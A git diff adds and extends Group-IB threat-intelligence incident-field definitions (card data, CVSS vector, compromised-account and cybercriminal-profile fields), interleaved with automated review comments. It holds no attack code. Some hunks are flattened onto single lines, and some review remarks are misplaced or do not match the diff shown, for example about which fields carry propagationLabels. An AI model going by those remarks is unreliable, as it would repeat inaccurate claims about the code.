b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CVSS_Vector.json 
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB OSI Vulnerability"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibcvssvector",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibcvssvector",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB CVSS Vector",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB OSI Vulnerability"
+ ],
+ "threshold": 72,
+ "type": "shortText",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CVV.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CVV.json
index 14dbd120e895..2223b0df2ce1 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CVV.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_CVV.json
@@ -26,5 +26,10 @@
 "unsearchable": false,
 "useAsKpi": false,
 "version": -1,
- "fromVersion": "6.0.0"
+ "fromVersion": "6.0.0",
+ "itemVersion": "1.4.2",
+ "openEnded": false,
+ "systemAssociatedTypes": [
+ "GIB Compromised Card"
+ ]
 }
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Card_Issuer.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Card_Issuer.json
index 45ca46724eb7..b3b3613519d5 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Card_Issuer.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Card_Issuer.json
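Review bot: The context lines of the GIB CVV hunk show the field stays `"unsearchable": false`, and the Card Number hunk that follows keeps the same setting while extending the field to `GIB Compromised Card Group`, so full card numbers and CVVs are indexed and retrievable through incident search on every incident of those types. The Admiralty Code and Credibility fields touched by this same commit are `"unsearchable": true`; unless searching on raw card data is a requirement, `"unsearchable": true` on the CVV, Card Number and Card Valid Thru fields would limit where that data is copied, and the PR description should say whether the feed delivers these values masked. Card Issuer and Card Type do not carry the same sensitivity and can stay as they are.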
@@ -1,7 +1,8 @@
 {
 "associatedToAll": false,
 "associatedTypes": [
- "GIB Compromised Card"
+ "GIB Compromised Card",
+ "GIB Compromised Card Group"
 ],
 "caseInsensitive": false,
 "cliName": "gibcardissuer",
@@ -26,5 +27,11 @@
 "unsearchable": false,
 "useAsKpi": false,
 "version": -1,
- "fromVersion": "6.0.0"
+ "fromVersion": "6.0.0",
+ "itemVersion": "1.4.2",
+ "openEnded": false,
+ "systemAssociatedTypes": [
+ "GIB Compromised Card",
+ "GIB Compromised Card Group"
+ ]
 }
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Card_Number.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Card_Number.json
index c8ac3523f2e5..ae44fd3d1100 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Card_Number.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Card_Number.json
@@ -1,7 +1,8 @@
 {
 "associatedToAll": false,
 "associatedTypes": [
- "GIB Compromised Card"
+ "GIB Compromised Card",
+ "GIB Compromised Card Group"
 ],
 "caseInsensitive": true,
 "cliName": "gibcardnumber",
@@ -25,5 +26,11 @@
 "unsearchable": false,
 "useAsKpi": false,
 "version": -1,
- "fromVersion": "6.0.0"
+ "fromVersion": "6.0.0",
+ "itemVersion": "1.4.2",
+ "openEnded": false,
+ "systemAssociatedTypes": [
+ "GIB Compromised Card",
+ "GIB Compromised Card Group"
+ ]
 }
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Card_Type.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Card_Type.json
index b61b0251caf1..ee0fe46fc093 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Card_Type.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Card_Type.json
@@ -1,7 +1,8 @@
 {
 "associatedToAll": false,
 "associatedTypes": [
- "GIB Compromised Card"
+ "GIB Compromised Card",
+ "GIB Compromised Card Group"
 ],
 "caseInsensitive": true,
 "cliName": "gibcardtype",
@@ -25,5 +26,11 @@
 "unsearchable": false,
 "useAsKpi": false,
 "version": -1,
- "fromVersion": "6.0.0"
+ "fromVersion": "6.0.0",
+ "itemVersion": "1.4.2",
+ "openEnded": false,
+ "systemAssociatedTypes": [
+ "GIB Compromised Card",
+ "GIB Compromised Card Group"
+ ]
 }
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Card_Valid_Thru.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Card_Valid_Thru.json
index da2f2aa5d76e..303bc1ccf97c 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Card_Valid_Thru.json
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Card_Valid_Thru.json
@@ -25,5 +25,10 @@
 "unsearchable": false,
 "useAsKpi": false,
 "version": -1,
- "fromVersion": "6.0.0"
+ "fromVersion": "6.0.0",
+ "itemVersion": "1.4.2",
+ "openEnded": false,
+ "systemAssociatedTypes": [
+ "GIB Compromised Card"
+ ]
 }
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Compromised_Account.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Compromised_Account.json
new file mode 100644
index 000000000000..e2a4638d492d
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Compromised_Account.json
@@ -0,0 +1,36 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Mule" + ], + "caseInsensitive": true, + "cliName": "gibcompromisedaccount", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibcompromisedaccount", + "isReadOnly": false, + "locked": false, + "name": "GIB Compromised Account", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Mule" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Compromised_Events_Information_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Compromised_Events_Information_Table.json new file mode 100644 index 000000000000..4e3f47e5777b --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Compromised_Events_Information_Table.json 
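Review bot: The new field is called `GIB Compromised Account` (cliName `gibcompromisedaccount`), which is also the exact name of an existing incident type listed in the Admiralty Code and Credibility hunks of this commit, yet the field is associated only with `GIB Compromised Mule`. A field and an incident type with identical names are easy to confuse in layouts, classifier rules and automations; a name that says what the value is, for example `"name": "GIB Mule Account"`, or at least a README entry describing the field, would remove the ambiguity.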
@@ -0,0 +1,231 @@ +{ + "id": "incident_gibcompromisedeventsinformationtable", + "version": -1, + "modified": "2024-10-14T05:35:12.890575061-04:00", + "name": "GIB Compromised Events Information Table", + "ownerOnly": false, + "cliName": "gibcompromisedeventsinformationtable", + "type": "grid", + "closeForm": true, + "editForm": true, + "required": false, + "neverSetAsRequired": false, + "isReadOnly": false, + "useAsKpi": false, + "locked": false, + "system": false, + "content": true, + "group": 0, + "hidden": false, + "openEnded": false, + "associatedTypes": [ + "GIB Compromised Account Group" + ], + "associatedToAll": false, + "unmapped": false, + "unsearchable": false, + "caseInsensitive": true, + "columns": [ + { + "key": "cnc", + "displayName": "cnc", + "type": "shortText", + "orgType": "shortText", + "required": false, + "script": "", + "width": 150, + "isDefault": true, + "fieldCalcScript": "", + "isReadOnly": false, + "selectValues": null + }, + { + "key": "asn", + "displayName": "asn", + "type": "shortText", + "orgType": "shortText", + "required": false, + "script": "", + "width": 150, + "isDefault": true, + "fieldCalcScript": "", + "isReadOnly": false, + "selectValues": null + }, + { + "key": "city", + "displayName": "city", + "type": "shortText", + "orgType": "shortText", + "required": false, + "script": "", + "width": 150, + "isDefault": true, + "fieldCalcScript": "", + "isReadOnly": false, + "selectValues": null + }, + { + "key": "region", + "displayName": "region", + "type": "shortText", + "orgType": "shortText", + "required": false, + "script": "", + "width": 150, + "isDefault": true, + "fieldCalcScript": "", + "isReadOnly": false, + "selectValues": null + }, + { + "key": "provider", + "displayName": "provider", + "type": "shortText", + "orgType": "shortText", + "required": false, + "script": "", + "width": 150, + "isDefault": true, + "fieldCalcScript": "", + "isReadOnly": false, + "selectValues": null + }, + { + "key": "countrycode", + "displayName": 
"countryCode", + "type": "shortText", + "orgType": "shortText", + "required": false, + "script": "", + "width": 150, + "isDefault": true, + "fieldCalcScript": "", + "isReadOnly": false, + "selectValues": null + }, + { + "key": "ip", + "displayName": "ip", + "type": "shortText", + "orgType": "shortText", + "required": false, + "script": "", + "width": 150, + "isDefault": true, + "fieldCalcScript": "", + "isReadOnly": false, + "selectValues": null + }, + { + "key": "malware", + "displayName": "malware", + "type": "shortText", + "orgType": "shortText", + "required": false, + "script": "", + "width": 150, + "isDefault": true, + "fieldCalcScript": "", + "isReadOnly": false, + "selectValues": null + }, + { + "key": "threatactor", + "displayName": "threatActor", + "type": "shortText", + "orgType": "shortText", + "required": false, + "script": "", + "width": 150, + "isDefault": true, + "fieldCalcScript": "", + "isReadOnly": false, + "selectValues": null + }, + { + "key": "datedetected", + "displayName": "dateDetected", + "type": "date", + "orgType": "date", + "required": false, + "script": "", + "width": 150, + "isDefault": true, + "fieldCalcScript": "", + "isReadOnly": false, + "selectValues": null + }, + { + "key": "datecompromised", + "displayName": "dateCompromised", + "type": "date", + "orgType": "date", + "required": false, + "script": "", + "width": 150, + "isDefault": true, + "fieldCalcScript": "", + "isReadOnly": false, + "selectValues": null + }, + { + "key": "phone", + "displayName": "phone", + "type": "shortText", + "orgType": "shortText", + "required": false, + "script": "", + "width": 150, + "isDefault": true, + "fieldCalcScript": "", + "isReadOnly": false, + "selectValues": null + }, + { + "key": "name", + "displayName": "name", + "type": "shortText", + "orgType": "shortText", + "required": false, + "script": "", + "width": 150, + "isDefault": true, + "fieldCalcScript": "", + "isReadOnly": false, + "selectValues": null + }, + { + "key": "email", + 
"displayName": "email", + "type": "shortText", + "orgType": "shortText", + "required": false, + "script": "", + "width": 150, + "isDefault": true, + "fieldCalcScript": "", + "isReadOnly": false, + "selectValues": null + }, + { + "key": "address", + "displayName": "address", + "type": "shortText", + "orgType": "shortText", + "required": false, + "script": "", + "width": 150, + "isDefault": true, + "fieldCalcScript": "", + "isReadOnly": false, + "selectValues": null + } + ], + "defaultRows": [ + {} + ], + "sla": 0, + "threshold": 72, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Compromised_Events_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Compromised_Events_Table.json new file mode 100644 index 000000000000..b7d38c090182 --- /dev/null +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Compromised_Events_Table.json 
@@ -0,0 +1,171 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Compromised Card Group" + ], + "caseInsensitive": true, + "cliName": "gibcompromisedeventstable", + "closeForm": true, + "columns": [ + { + "displayName": "Valid Thru Date", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "validthrudate", + "orgType": "date", + "required": false, + "script": "", + "selectValues": null, + "type": "date", + "width": 150 + }, + { + "displayName": "Valid Thru", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "validthru", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Client IP", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "clientip", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "CNC", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "cnc", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "CNC IP", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "cncip", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Threat Actor Name", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "threatactorname", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Date Compromised", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "datecompromised", + "orgType": "date", + "required": false, + "script": "", + "selectValues": null, + "type": "date", + "width": 150 + }, + { 
+ "displayName": "Victim Phone", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "victimphone", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Victim Name", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "victimname", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + }, + { + "displayName": "Malware", + "fieldCalcScript": "", + "isDefault": true, + "isReadOnly": false, + "key": "malware", + "orgType": "shortText", + "required": false, + "script": "", + "selectValues": null, + "type": "shortText", + "width": 150 + } + ], + "content": true, + "defaultRows": [ + {} + ], + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibcompromisedeventstable", + "isReadOnly": false, + "locked": false, + "name": "GIB Compromised Events Table", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "propagationLabels": [ + "all" + ], + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Compromised Card Group" + ], + "threshold": 72, + "type": "grid", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Compromised_Login.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Compromised_Login.json index a0764a1a0c79..8dce47a32c1f 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Compromised_Login.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Compromised_Login.json 
@@ -1,7 +1,8 @@
 {
 "associatedToAll": false,
 "associatedTypes": [
- "GIB Compromised Account"
+ "GIB Compromised Account",
+ "GIB Compromised Account Group"
 ],
 "caseInsensitive": false,
 "cliName": "gibcompromisedlogin",
@@ -25,5 +26,11 @@
 "unsearchable": false,
 "useAsKpi": false,
 "version": -1,
- "fromVersion": "6.0.0"
+ "fromVersion": "6.0.0",
+ "itemVersion": "1.4.2",
+ "openEnded": false,
+ "systemAssociatedTypes": [
+ "GIB Compromised Account",
+ "GIB Compromised Account Group"
+ ]
 }
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Country_Code.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Country_Code.json
new file mode 100644
index 000000000000..2c1cd4dba79d
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Country_Code.json
@@ -0,0 +1,34 @@
+{
+ "associatedToAll": false,
+ "associatedTypes": [
+ "GIB Attacks Deface"
+ ],
+ "caseInsensitive": true,
+ "cliName": "gibcountrycode",
+ "closeForm": true,
+ "content": true,
+ "editForm": true,
+ "group": 0,
+ "hidden": false,
+ "id": "incident_gibcountrycode",
+ "isReadOnly": false,
+ "itemVersion": "1.4.2",
+ "locked": false,
+ "name": "GIB Country Code",
+ "neverSetAsRequired": false,
+ "openEnded": false,
+ "ownerOnly": false,
+ "required": false,
+ "sla": 0,
+ "system": false,
+ "systemAssociatedTypes": [
+ "GIB Attacks Deface"
+ ],
+ "threshold": 72,
+ "type": "shortText",
+ "unmapped": false,
+ "unsearchable": false,
+ "useAsKpi": false,
+ "version": -1,
+ "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Country_Name.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Country_Name.json
new file mode 100644
index 000000000000..2cbb17a05c51
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Country_Name.json @@ -0,0 +1,34 @@ +{ + "associatedToAll": false, + "associatedTypes": [ + "GIB Attacks Deface" + ], + "caseInsensitive": true, + "cliName": "gibcountryname", + "closeForm": true, + "content": true, + "editForm": true, + "group": 0, + "hidden": false, + "id": "incident_gibcountryname", + "isReadOnly": false, + "itemVersion": "1.4.2", + "locked": false, + "name": "GIB Country Name", + "neverSetAsRequired": false, + "openEnded": false, + "ownerOnly": false, + "required": false, + "sla": 0, + "system": false, + "systemAssociatedTypes": [ + "GIB Attacks Deface" + ], + "threshold": 72, + "type": "shortText", + "unmapped": false, + "unsearchable": false, + "useAsKpi": false, + "version": -1, + "fromVersion": "6.10.0" +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Credibility.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Credibility.json index 9f7065ac5975..38419beb3e84 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Credibility.json +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Credibility.json @@ -8,7 +8,22 @@ "GIB Data Breach", "GIB OSI Git Leak", "GIB OSI Public Leak", - "GIB Targeted Malware" + "GIB Targeted Malware", + "GIB Compromised Account Group", + "GIB Compromised Card Group", + "GIB Compromised Mule", + "GIB OSI Vulnerability", + "GIB Attacks DDOS", + "GIB Attacks Deface", + "GIB Attacks Phishing Group", + "GIB Attacks Phishing Kit", + "GIB Suspicious IP TOR Node", + "GIB Suspicious IP Open Proxy", + "GIB Suspicious IP VPN", + "GIB Suspicious IP Scanner", + "GIB Cybercriminal Threat", + "GIB Suspicious IP Socks Proxy", + "GIB Nation-State Cybercriminals Threat" ], "caseInsensitive": true, "cliName": "gibcredibility", 
@@ -33,5 +48,32 @@
     "unsearchable": true,
     "useAsKpi": false,
     "version": -1,
-    "fromVersion": "6.0.0"
-}
+    "fromVersion": "6.0.0",
+    "itemVersion": "1.4.2",
+    "openEnded": false,
+    "systemAssociatedTypes": [
+        "GIB Brand Protection Phishing",
+        "GIB Brand Protection Phishing Kit",
+        "GIB Compromised Account",
+        "GIB Compromised Card",
+        "GIB Data Breach",
+        "GIB OSI Git Leak",
+        "GIB OSI Public Leak",
+        "GIB Targeted Malware",
+        "GIB Compromised Account Group",
+        "GIB Compromised Card Group",
+        "GIB Compromised Mule",
+        "GIB OSI Vulnerability",
+        "GIB Attacks DDOS",
+        "GIB Attacks Deface",
+        "GIB Attacks Phishing Group",
+        "GIB Attacks Phishing Kit",
+        "GIB Suspicious IP TOR Node",
+        "GIB Suspicious IP Open Proxy",
+        "GIB Suspicious IP VPN",
+        "GIB Suspicious IP Scanner",
+        "GIB Cybercriminal Threat",
+        "GIB Suspicious IP Socks Proxy",
+        "GIB Nation-State Cybercriminals Threat"
+    ]
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Expertises.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Expertises.json
new file mode 100644
index 000000000000..93c73008f950
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Expertises.json
@@ -0,0 +1,36 @@
+{
+    "associatedToAll": false,
+    "associatedTypes": [
+        "GIB Cybercriminal Threat",
+        "GIB Cybercriminal Threat Actor"
+    ],
+    "caseInsensitive": true,
+    "cliName": "gibcybercriminalexpertises",
+    "closeForm": true,
+    "content": true,
+    "editForm": true,
+    "group": 0,
+    "hidden": false,
+    "id": "incident_gibcybercriminalexpertises",
+    "isReadOnly": false,
+    "itemVersion": "1.4.2",
+    "locked": false,
+    "name": "GIB Cybercriminal Expertises",
+    "neverSetAsRequired": false,
+    "openEnded": true,
+    "ownerOnly": false,
+    "required": false,
+    "sla": 0,
+    "system": false,
+    "systemAssociatedTypes": [
+        "GIB Cybercriminal Threat",
+        "GIB Cybercriminal Threat Actor"
+    ],
+    "threshold": 72,
+    "type": "multiSelect",
+    "unmapped": false,
+    "unsearchable": false,
+    "useAsKpi": false,
+    "version": -1,
+    "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Forums_Table.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Forums_Table.json
new file mode 100644
index 000000000000..ef90bdbb6328
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Forums_Table.json
@@ -0,0 +1,67 @@
+{
+    "associatedToAll": false,
+    "associatedTypes": [
+        "GIB Cybercriminal Threat"
+    ],
+    "caseInsensitive": true,
+    "cliName": "gibcybercriminalforumstable",
+    "closeForm": true,
+    "columns": [
+        {
+            "displayName": "Nickname",
+            "fieldCalcScript": "",
+            "isDefault": true,
+            "isReadOnly": false,
+            "key": "nickname",
+            "orgType": "shortText",
+            "required": false,
+            "script": "",
+            "selectValues": null,
+            "type": "shortText",
+            "width": 305
+        },
+        {
+            "displayName": "URL",
+            "fieldCalcScript": "",
+            "isDefault": true,
+            "isReadOnly": false,
+            "key": "url",
+            "orgType": "url",
+            "required": false,
+            "script": "",
+            "selectValues": null,
+            "type": "url",
+            "width": 150
+        }
+    ],
+    "content": true,
+    "defaultRows": [
+        {}
+    ],
+    "editForm": true,
+    "group": 0,
+    "hidden": false,
+    "id": "incident_gibcybercriminalforumstable",
+    "isReadOnly": false,
+    "locked": false,
+    "name": "GIB Cybercriminal Forums Table",
+    "neverSetAsRequired": false,
+    "openEnded": false,
+    "ownerOnly": false,
+    "propagationLabels": [
+        "all"
+    ],
+    "required": false,
+    "sla": 0,
+    "system": false,
+    "systemAssociatedTypes": [
+        "GIB Cybercriminal Threat"
+    ],
+    "threshold": 72,
+    "type": "grid",
+    "unmapped": false,
+    "unsearchable": false,
+    "useAsKpi": false,
+    "version": -1,
+    "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Malware.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Malware.json
new file mode 100644
index 000000000000..379181c531c3
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Malware.json
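Review bot: This grid field omits the `"itemVersion": "1.4.2"` key that every other field added in this commit carries, and the GIB Cybercriminal Threat Actor Reports Table hunk further down omits it as well; if itemVersion is meant to be present on all pack items, `"itemVersion": "1.4.2",` should be added after `"isReadOnly"` in both files for consistency. The `"propagationLabels": ["all"]` key is likewise present only on the two grid fields and on GIB DDOS Target Domain, while the other new fields have none; if propagation to all tenants is intended it should be applied uniformly, otherwise the three occurrences look accidental and are worth a second look before merge.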
@@ -0,0 +1,34 @@
+{
+    "associatedToAll": false,
+    "associatedTypes": [
+        "GIB Cybercriminal Threat Actor"
+    ],
+    "caseInsensitive": true,
+    "cliName": "gibcybercriminalmalware",
+    "closeForm": true,
+    "content": true,
+    "editForm": true,
+    "group": 0,
+    "hidden": false,
+    "id": "incident_gibcybercriminalmalware",
+    "isReadOnly": false,
+    "itemVersion": "1.4.2",
+    "locked": false,
+    "name": "GIB Cybercriminal Malware",
+    "neverSetAsRequired": false,
+    "openEnded": true,
+    "ownerOnly": false,
+    "required": false,
+    "sla": 0,
+    "system": false,
+    "systemAssociatedTypes": [
+        "GIB Cybercriminal Threat Actor"
+    ],
+    "threshold": 72,
+    "type": "multiSelect",
+    "unmapped": false,
+    "unsearchable": false,
+    "useAsKpi": false,
+    "version": -1,
+    "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Regions.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Regions.json
new file mode 100644
index 000000000000..92aa0926b93d
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Regions.json
@@ -0,0 +1,36 @@
+{
+    "associatedToAll": false,
+    "associatedTypes": [
+        "GIB Cybercriminal Threat",
+        "GIB Cybercriminal Threat Actor"
+    ],
+    "caseInsensitive": true,
+    "cliName": "gibcybercriminalregions",
+    "closeForm": true,
+    "content": true,
+    "editForm": true,
+    "group": 0,
+    "hidden": false,
+    "id": "incident_gibcybercriminalregions",
+    "isReadOnly": false,
+    "itemVersion": "1.4.2",
+    "locked": false,
+    "name": "GIB Cybercriminal Regions",
+    "neverSetAsRequired": false,
+    "openEnded": true,
+    "ownerOnly": false,
+    "required": false,
+    "sla": 0,
+    "system": false,
+    "systemAssociatedTypes": [
+        "GIB Cybercriminal Threat",
+        "GIB Cybercriminal Threat Actor"
+    ],
+    "threshold": 72,
+    "type": "multiSelect",
+    "unmapped": false,
+    "unsearchable": false,
+    "useAsKpi": false,
+    "version": -1,
+    "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Sectors.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Sectors.json
new file mode 100644
index 000000000000..1445c34629b1
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Sectors.json
@@ -0,0 +1,36 @@
+{
+    "associatedToAll": false,
+    "associatedTypes": [
+        "GIB Cybercriminal Threat",
+        "GIB Cybercriminal Threat Actor"
+    ],
+    "caseInsensitive": true,
+    "cliName": "gibcybercriminalsectors",
+    "closeForm": true,
+    "content": true,
+    "editForm": true,
+    "group": 0,
+    "hidden": false,
+    "id": "incident_gibcybercriminalsectors",
+    "isReadOnly": false,
+    "itemVersion": "1.4.2",
+    "locked": false,
+    "name": "GIB Cybercriminal Sectors",
+    "neverSetAsRequired": false,
+    "openEnded": true,
+    "ownerOnly": false,
+    "required": false,
+    "sla": 0,
+    "system": false,
+    "systemAssociatedTypes": [
+        "GIB Cybercriminal Threat",
+        "GIB Cybercriminal Threat Actor"
+    ],
+    "threshold": 72,
+    "type": "multiSelect",
+    "unmapped": false,
+    "unsearchable": false,
+    "useAsKpi": false,
+    "version": -1,
+    "fromVersion": "6.10.0"
+}
\ No newline at end of file
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Actor_Aliases.json b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Actor_Aliases.json
new file mode 100644
index 000000000000..121d774b64ec
--- /dev/null
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/IncidentFields/incidentfield-GIB_Cybercriminal_Threat_Actor_Aliases.json
@@ -0,0 +1,34 @@
+{
+    "associatedToAll": false,
+    "associatedTypes": [
+        "GIB Cybercriminal Threat Actor"
+    ],
+    "caseInsensitive": true,
+    "cliName": "gibcybercriminalthreatactoraliases",
+    "closeForm": true,
+    "content": true,
+    "editForm": true,
+    "group": 0,
+    "hidden": false,
+    "id": "incident_gibcybercriminalthreatactoraliases",
+    "isReadOnly": false,
+    "itemVersion": "1.4.2",
+    "locked": false,
+    "name": "GIB Cybercriminal Threat Actor Aliases",
+    "neverSetAsRequired": false,
+    "openEnded": true,
+    "ownerOnly": false,
+    "required": false,
+    "sla": 0,
+    "system": false,
+    "systemAssociatedTypes": [
